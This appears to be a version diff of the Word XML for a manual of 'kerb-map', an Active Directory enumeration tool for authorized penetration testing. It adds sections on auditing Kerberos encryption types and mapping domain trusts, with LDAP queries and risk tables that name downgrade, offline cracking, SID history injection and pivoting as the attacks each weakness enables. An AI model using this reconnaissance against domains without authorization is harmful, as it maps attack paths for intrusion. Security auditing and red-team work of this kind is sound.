--- a/kerb-map-manual.docx
+++ b/kerb-map-manual.docx
@@ -83,7 +83,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Version 1.0</w:t>
+        <w:t>Version 1.1</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -133,49 +133,7 @@
               <w:rPr>
                 <w:color w:val="A8D8EA"/>
               </w:rPr>
-              <w:t xml:space="preserve">AD </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>Enumeration  ·</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>Kerberoast</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>Scoring  ·</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  Delegation Mapping</w:t>
+              <w:t>AD Enumeration  ·  Kerberoast Scoring  ·  Delegation Mapping</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -187,49 +145,7 @@
               <w:rPr>
                 <w:color w:val="A8D8EA"/>
               </w:rPr>
-              <w:t xml:space="preserve">CVE </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>Detection  ·</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  Priority </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>Ranking  ·</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t>BloodHound</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="A8D8EA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Export</w:t>
+              <w:t>CVE Detection  ·  Priority Ranking  ·  BloodHound Export  ·  Encryption Audit  ·  Trust Mapping</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -287,27 +203,839 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">For use in </w:t>
-      </w:r>
+        <w:t>For use in authorized penetration testing and red team engagements only.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="100" w:name="_Toc224561350"/>
+      <w:r>
+        <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="100"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="888888"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>authorized</w:t>
-      </w:r>
+        <w:t>Audits Kerberos encryption type configuration across all domain accounts and Domain Controllers. Weak encryption (RC4/DES) enables faster offline cracking and downgrade attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="888888"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve"> penetration testing and red team engagements only.</w:t>
+        <w:t>The module queries msDS-SupportedEncryptionTypes for all enabled user accounts and all DCs (userAccountControl bit 8192).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="3120"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Check</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Condition</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>RC4-only accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>enc=0 or RC4 set without AES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DES accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DES-CBC-CRC or DES-CBC-MD5 enabled</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CRITICAL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Weak DCs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DC supports RC4 or has no explicit AES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>All findings feed into the priority scorer — weak DCs score 65 (HIGH), DES accounts score 60 (HIGH).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="101" w:name="_Toc224561351"/>
+      <w:r>
+        <w:t>4.6  Trust Mapper  (--trusts)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="101"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Enumerates all domain trusts and assesses their risk based on direction, type, SID filtering status, and encryption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>LDAP filter: (objectClass=trustedDomain)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Attributes: name, trustDirection, trustType, trustAttributes, securityIdentifier</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Risk Assessment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="1560"/>
+        <w:gridCol w:w="4680"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Configuration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Why</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Forest trust + SID filtering OFF</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CRITICAL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>SID history injection across forest boundary</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bidirectional + no SID filtering</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Pivot path with SID history abuse</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bidirectional trust</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>MEDIUM</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Pivot possible if partner domain compromised</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>RC4 encryption on trust</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Weak encryption</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Output is a Rich table showing trust partner, direction, type, SID filtering status, and risk level.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -354,11 +1082,7 @@
           </w:pPr>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
-          </w:r>
-          <w:r>
             <w:instrText>TOC \h \o "1-3"</w:instrText>
-          </w:r>
-          <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
           <w:hyperlink w:anchor="_Toc224561280" w:history="1">
@@ -374,40 +1098,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561280 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -435,40 +1129,10 @@
                 <w:noProof/>
               </w:rPr>
